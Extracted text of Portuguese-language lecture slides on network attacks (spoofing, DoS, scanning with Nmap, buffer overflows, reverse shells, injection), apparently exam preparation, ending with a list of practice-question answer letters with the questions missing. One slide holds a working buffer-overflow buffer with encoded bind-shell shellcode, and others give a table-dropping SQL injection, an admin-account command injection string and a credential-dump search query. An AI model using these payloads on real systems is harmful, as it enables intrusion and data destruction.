Ataques em redes de computadores
Atividades
Google Hacking
Técnica que utiliza o Google para localizar servidores WEB vulneráveis ou até mesmo com backdoors ativos
Muito utilizado por hackers
Exemplo: Ao fazer uma pesquisa por allinurl:auth_user_file.txt no google encontramos uma lista de URLs com dump de MYSql server na internet, com livre acesso. Nesses dumps podemos encontrar credenciais de acesso que ainda podem ser válidas.
Para esta função o Google dispõe de diversos operadores que auxiliam na tarefa.
Ataques em redes de computadores
Tipos
Ataques em redes de computadores
Ataques
ARP Spoofing
Enganar o mapemento entre o endereço MAC e o enderereço IP feito pelo protocolo ARP (Address Resolution Protocol).
Endereço IP de 32 bits
Endereço Ethernet de 48 bits
Ataques em redes de computadores
Ataques
ARP Spoofing (cont.)
Deste ataque deriva uma técnica que permite fazer sniffing em uma rede com switches, mesmo sem o uso de portas de monitoramento=
Ataques em redes de computadores
Ataques
ARP Spoofing : Ferramenta
EtterCap
Mutito utilizada para fazer ataques ARP Spoofing e seus derivantes.
Ataques em redes de computadores
Ataques
DNS Spoofing
Ataque derivante do ARP Spoofing
Tem como objetivo desviar todas as solicitações de DNS que iriam para a internet para um DNS server controlado pelo hacker.
Com este controle é possível fazer o usuário abrir páginas com códigos maliciosos, fazendo que estas passem para o controle do atacante
A ferramenta Ettercap também é utilizada para este ataque
Ataques em redes de computadores
IP Spoofing
Falsificação de endereço IP de origem;
Não é possível obter respostas – vai para o endereço forjado;
Muito usado em ataques de negação de serviço (Denial-of-Service, DoS);
Egress Filtering para prevenção (anti-spoofing).
Ataques em redes de computadores
Fragmentação de pacotes IP
Característica do próprio protocolo;
MTU (Maximum Transfer Unit) – Ethernet é 1500, FDDI é 4470;
Fragmentação e reagrupamento (desfragmentação);
Uso de offsets para o reagrupamento.
Ataques em redes de computadores
Fragmentação de pacotes IP (cont.)
Ping of Death;
Teadrop;
Land;
Overlapping Fragment Attack.
Ataques em redes de computadores
Denial of Service
Afeta a disponibilidade da informação;
Explora recursos de uma forma agressiva, estressando-os e impedindo-os de realizar suas tarefas básicas;
Usuários legítimos ficam impedidos de acessar o recurso;
Pode “derrubar” um servidor, encher um link, estourar a memória ou explorar uma vulnerabilidade.
Ataques em redes de computadores
SYN FloodingCliente Servidor
SYN seq= x
SYN seq= y, ACK x + 1
ACK y + 1
Conexão estabelecida
Vários pacotes SYN
Fila das conexõesdo servidor cheia
SYN flooding
Ataques em redes de computadores
Smurf e Fraggle
Pacote PING (ICMP echo) para o endereço broadcast da rede, usando IP Spoofing;
Todos os hosts da rede respondem ao PING para o host que teve o seu endereço falsificado (IP Spoofing);
Duas vítimas: a rede, que fica congestionada, e o host que teve o seu endereço falsificado.
Fraggle usa UDP ao invés de ICMP.
Ataques em redes de computadores
Session Hijacking (Sequestro de sessões)
Man-in-the-Middle ou Session Hijacking;
Explora o prognóstico do número de seqüência (sequence number prediction) do three-way handshake;
O atacante fica entre o cliente e o servidor, podendo assim alterar toda a comunicação entre eles;
O atacante envia informações infiltrando-se nas conexões, baseado na descoberta do número de seqüência dessas conexões.
Ataques em redes de computadores
Ataques coordenados
Ataque de negação de serviço distribuído, ou Distributed Denial-of-Service (DDoS);
Dificuldade de descobrir a origem dos ataques: milhares de origens do ataque;
Botnets - Redes de zumbis (bots) que atendem a comandos de uma central de comando e controle (C2), realizando ataques contra alvos determinados pelos seus mestres
Todos os zumbis e os alvos de seus ataques são vítimas.
Ataques em redes de computadores
Buffer Overflow
Exploração de uma falha na aplicação, onde uma variável do programa pode expor outras áreas da memória ao hacker, permitindo sua manipulação, mesmo remota, com o carregamento de códigos maliciosos.
Muitas técnicas auxiliam na descobertas destas vulnerabilidades, tornando-se cada vez mais comuns
Ataques em redes de computadores#buffer = "A" * 2000buffer="\x41"*969
buffer+="\xed\x1e\x94\x7c"#buffer+="\7c" + "\94" + "\1E" + "\ED"
#buffer+="\x42" * 4buffer+="\x43" * 16buffer+="\x90" * 16
buffer+=("\xb8\x52\x1c\x20\xa1\xd9\xe1\xd9\x74\x24\xf4\x5a\x33\xc9\xb1""\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x5d\xfe\xd5\x5d\x89\x77""\x15\x9e\x49\xe8\x9f\x7b\x78\x3a\xfb\x08\x28\x8a\x8f\x5d\xc0""\x61\xdd\x75\x53\x07\xca\x7a\xd4\xa2\x2c\xb4\xe5\x02\xf1\x1a""\x25\x04\x8d\x60\x79\xe6\xac\xaa\x8c\xe7\xe9\xd7\x7e\xb5\xa2""\x9c\x2c\x2a\xc6\xe1\xec\x4b\x08\x6e\x4c\x34\x2d\xb1\x38\x8e""\x2c\xe2\x90\x85\x67\x1a\x9b\xc2\x57\x1b\x48\x11\xab\x52\xe5""\xe2\x5f\x65\x2f\x3b\x9f\x57\x0f\x90\x9e\x57\x82\xe8\xe7\x50""\x7c\x9f\x13\xa3\x01\x98\xe7\xd9\xdd\x2d\xfa\x7a\x96\x96\xde""\x7b\x7b\x40\x94\x70\x30\x06\xf2\x94\xc7\xcb\x88\xa1\x4c\xea""\x5e\x20\x16\xc9\x7a\x68\xcd\x70\xda\xd4\xa0\x8d\x3c\xb0\x1d""\x28\x36\x53\x4a\x4a\x15\x3c\xbf\x61\xa6\xbc\xd7\xf2\xd5\x8e""\x78\xa9\x71\xa3\xf1\x77\x85\xc4\x28\xcf\x19\x3b\xd2\x30\x33""\xf8\x86\x60\x2b\x29\xa6\xea\xab\xd6\x73\xbc\xfb\x78\x2b\x7d""\xac\x38\x9b\x15\xa6\xb6\xc4\x06\xc9\x1c\x73\x01\x07\x44\xd0""\xe6\x6a\x7a\xc7\xaa\xe3\x9c\x8d\x42\xa2\x37\x39\xa1\x91\x8f""\xde\xda\xf3\xa3\x77\x4d\x4b\xaa\x4f\x72\x4c\xf8\xfc\xdf\xe4"
"\x6b\x76\x0c\x31\x8d\x89\x19\x11\xc4\xb2\xca\xeb\xb8\x71\x6a""\xeb\x90\xe1\x0f\x7e\x7f\xf1\x46\x63\x28\xa6\x0f\x55\x21\x22""\xa2\xcc\x9b\x50\x3f\x88\xe4\xd0\xe4\x69\xea\xd9\x69\xd5\xc8""\xc9\xb7\xd6\x54\xbd\x67\x81\x02\x6b\xce\x7b\xe5\xc5\x98\xd0""\xaf\x81\x5d\x1b\x70\xd7\x61\x76\x06\x37\xd3\x2f\x5f\x48\xdc"
"\xa7\x57\x31\x00\x58\x97\xe8\x80\x66\x69\x20\x1d\xfe\xd0\xd1""\x5c\x62\xe3\x0c\xa2\x9b\x60\xa4\x5b\x58\x78\xcd\x5e\x24\x3e"
"\x3e\x13\x35\xab\x40\x80\x36\xfe")buffer+="\xCC" * 630
Acionamento da vulnerabilidade
Código malicioso que criará uma porta adicional (4444/TCP) e dará acesso remoto ao
shell do computador
Ataques em redes de computadoresTipos de shell
Normalmente um ataque buffer overflow é usado para obter um shell no sistema alvo
Existem dois tipos básicos
Direct shell - Uma porta é aberta no sistema alvo e é associada a um shell do sistema operacional
Reverse shell - O código malicioso que foi executado no alvo estabelece uma conexão com o computador do atacante e transmite, através desta conexão, o acesso ao shell no sistema alvo
Conseguimos criar um shell (reverso ou direto) com algumas ferramentas, como o Netcat (comando nc no Linux) que permite algumas outras atividades ou com o Meterpreter, parte integrante do Metasploit, que é capaz de entregar ao atacante um shell avançado, com algumas funções para simplificar a coleta de informações no servidor alvo.
Ataques em redes de computadores
Shell reverso e tunneling
Uma das grandes vantagens do shell reverso é a possibilidade de bypass o firewall local, pois não há necessidade em abrir uma porta no alvo. O alvo se comunica com o atacante
Contudo, pela existência de um firewall, pode ser impossível um ataque a determinada porta que tenhamos descoberto haver outra vulnerabilidade a ser explorada.
Nestes cenários podemos aplicar uma técnica chamada tunneling, onde usamos um cliente de SSH no alvo que já obtivemos acesso para redirecionar o tráfego a uma outra porta local (por exemplo 3389/TCP - Remote desktop no Windows) atráves de um túnel cifrado pelo SSH
Ataques em redes de computadores
Ataques em redes de computadores
Escaneamento
Atividade realizada para descobrir portas e serviços nos hosts alvo
Se feito corretamente pode passar desapercebido para o administrador da rede
Contudo, sem os devidos cuidados pode aparecer imediatamente nas telas de IDS/IPS da rede
Ataques em redes de computadores
Three-way handshake do TCP
Three-way handshake do TCP:
O cliente envia uma requisição de conexão – pacote SYN;
O servidor recebe o pacote SYN e responde com uma resposta de reconhecimento (acknowledgement) – pacote SYN-ACK;
O cliente reconhece o pacote SYN-ACK – pacote ACK;
A conexão é estabelecida (three-way handshake);
A troca de dados acontece;
A conexão é encerrada com um pacote com flag FIN;
A conexão é encerrada de forma anormal com pacote RST.
Ataques em redes de computadores
TCP Connect:
Cliente envia um pacote SYN para a porta;
Caso o servidor aceite a conexão, a porta está aberta;
Caso contrário, a porta está fechada.
TCP SYN (half open):
Cliente envia um pacote SYN para a porta;
Caso o servidor responda com SYN-ACK, o cliente envia RST – a conexão é encerrada antes do seu estabelecimento.
Ataques em redes de computadores
UDP:
Cliente envia um pacote UDP de 0 byte para a porta;
Caso o servidor envie um pacote ICMP Port Unreachable, a porta está fechada;
Caso contrário, a porta está aberta.
FIN:
Modo stealth, ou seja, são mais difíceis de serem detectados;
Pacote FIN é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
Ataques em redes de computadores
Null Scan:
Modo stealth;
Pacote FIN, sem nenhum flag, é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
FIN:
Modo stealth;
Pacote FIN com os flags FIN, PUSH e URG ativados é enviado para a porta do servidor;
Caso um pacote RST é recebido, a porta está fechada.
Ataques em redes de computadoresIdle Scan
Técnica utilizada para fazer escaneamento oculto
Se baseia na avaliação do contado de pacote IP (IPID) do protocolo TCP/IP
Previamente ele manda um SYN para um host Zumbi e determina qual o IPID atual dele.
O atacante manda um pacote SYN para o alvo, com o IP spoofado do host Zumbi, direcionado a porta que ele deseja testar se está aberta ou não.
Depois o hacker testa novamente o atual IPID do host Zumbi
Se houve incremendo do IPID então a porta está aberta, pois o host alvo respondeu para o zumbi com um “SYN-ACK”
Se não houver incremento a porta está fechada, pois o host respondeu ao Zumbi com um pacote “RST”
Caso haja um IPS no host alvo apenas aparecerá os logs dos pacotes do zumbi, mas não do atacante real
Ataques em redes de computadores
Idle Scan (cont.)
Ataques em redes de computadores
Ferramentas para escanemento
NMAP - A mais popular das ferramentas para escanemento
Muito versátil, possui diversos recursos para descoberta de vulnerabilidades e “bypass” de IDS / IPS
Ataques em redes de computadores# nmap -A -T4 scanme.nmap.org playground
Starting nmap ( http://insecure.org/nmap/ )Interesting ports on scanme.nmap.org (205.217.153.62):(The 1663 ports scanned but not shown below are in state: filtered)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)53/tcp open domain70/tcp closed gopher80/tcp open http Apache httpd 2.0.52 ((Fedora))113/tcp closed authDevice type: general purposeRunning: Linux 2.4.X|2.5.X|2.6.XOS details: Linux 2.4.7 - 2.6.11, Linux 2.6.0 - 2.6.11Uptime 33.908 days (since Thu Jul 21 03:38:03 2005)
Interesting ports on playground.nmap.org (192.168.0.40):(The 1659 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn389/tcp open ldap?445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds1002/tcp open windows-icfw?1025/tcp open msrpc Microsoft Windows RPC1720/tcp open H.323/Q.931 CompTek AquaGateKeeper5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900)5900/tcp open vnc VNC (protocol 3.8)MAC Address: 00:A0:CC:63:85:4B (Lite-on Communications)Device type: general purposeRunning: Microsoft Windows NT/2K/XPOS details: Microsoft Windows XP Pro RC1+ through final releaseService Info: OSs: Windows, Windows XP
Nmap finished: 2 IP addresses (2 hosts up) scanned in 88.392 seconds
Ataques em redes de computadoresNMAP - Opções mais comuns
-sP - Ping Scan - Procura hosts através de ICMP
-P0 - Não faz mais um ICMP discovery prévio
-sS (TCP SYN), -sT (Connect), -sA (ACK), sU (Scan UDP ports)
-sI - Idle Scan
-p Lista de portas a escanear (se for omitido escaneará as chamadas Well Known ports)
-sV - Tenta obter informações sobre o serviço rodando nas portas abertas
-O - OS Fingerprint detection
-T[0-5] - Regula a velocidade dos scans
-f - Fragmentar pacotes
-D - Decoy
-S <ip_address> - Spoofar o IP
Ataques em redes de computadores
Ferramentas para atacar - Metasploit Framework
Consite em um framework completo, com diversos exploit prontos para uso, ferramentas para descoberta de novas vulnerabilidades, dentre outros
Muito utilizado por hackers, auditores de segurança e estudantes da área
De simples utilização (pode até mesmo ser automatizado)
Novos exploits são adicionados diáriamente e suas atualizações são gratúitas
Faz parte da distribuição Linux “Backtrack”
Ataques em redes de computadores
Ataques em redes de computadores
Ferramentas para ataques em Web App
Nikto
Scanner de vulnerabilidades em servidores WEB
Muito útil para descobrir fraquezas e erros de configuração em servidores WEB
Simples de usar
Faz parte do “Backtrack”
Algumas informações podem também ser obtidas com um telnet paras a porta do servidor WEB e um comando HTTP (exemplo HEAD/HTTP/1.0 pode retornar o banner do servidor)
Ataques em redes de computadores
Ataques em redes de computadoresAtaques de injeção
Em algumas situações é possível injetar informações em formulários e alterar o comportamento de uma aplicação. Os tipos mais comuns são
Injeção SQL - Atua modificando uma requisição legítima de SQL (ex: Fazer a autenticação de um usuário) para outra a escolha o hacker.
Ex: Consulta SQL normal: select * from user where senha =<Formulario>;
Ao digitarmos no formulário WEB a consulta abaixo no lugar da senha:
‘ or 1=1 --; droptable(<nome_tabela>);
Ao invés de fazer uma tentativa de login nós apagaremos a tabela de usuários.
Injeção de comandos - Comum em sistemas que executam comandos remotos e pedem o parametro por um formulário web (exemplo: traceroute para um destino definido pelo formulário). Se ao invés do IP fosse digitado:
; net user /add hacker hacker | net localgroup administrator hacker;
Ao invés de fazermos o traceroute nós criariamos um usuário, com acesso total (pois seria administrador), podendo conceder acesso via Remote Desktop (se fosse linux bastaria criar um usuário, clocar no grupo root e acessar via SSH).
Ataques em redes de computadores
Ferramentas para ataques em Web App
Dirbuster
Ferramenta que descobre arquivos hospedados em um servidor WEB, mesmo que estejam ocultos, com um uso de um arquivo de dicionário
Testa o servidor WEB procurando erros. Se tentar acessar determinado arquivo e receber uma mensagem, dizendo que o arquivo existe, mesmo que não seja possível acesso a ele, o mesmo será exibido em uma listagem.
Ataques em redes de computadores
Questões para praticar
Questões para praticar
Resposta: C
Questões para praticar
Respostas: A,B,C,D. Sam Spade é um pacote de ferramentas antigo, que pode fazer ping, traceroute e outras funções. Cheops é uma ferramenta de monitoramento de rede.
Questões para praticar
Resposta: B
Questões para praticar
Respostas: A, C, E
Questões para praticar
Resposta: A - Usuários administradores tem sempre seu RID (relative identifier) começando com 500
Questões para praticar
Resposta: D
Questões para praticar
Resposta: C
Questões para praticar
Resposta: C
Questões para praticar
Resposta: C
Questões para praticar
Resposta: A
Questões para praticar
Respostas: A e B
Questões para praticar
Resposta: E
Questões para praticar
Resposta: D
Questões para praticar
Resposta: C
Questões para praticar
Respostas: A e B. Notar que os 8 caracteres são identicos
Questões para praticar
Resposta: D
Questões para praticar
Resposta: A
Questões para praticar
Resposta: D
Questões para praticar
Resposta: E
Questões para praticar
Resposta: B - Consultar a tabela ASCII para entender a linha “0B0”
Questões para praticar
Resposta: B
Questões para praticar
Resposta: C - Converter o número para binário, depois pegar os últimos 8 bits e converter para decimal, obtendo o .5
Questões para praticar
Resposta: A
Questões para praticar
Resposta: A
Questões para praticar
Resposta: A
Questões para praticar
Revisão de provas da PF
FIM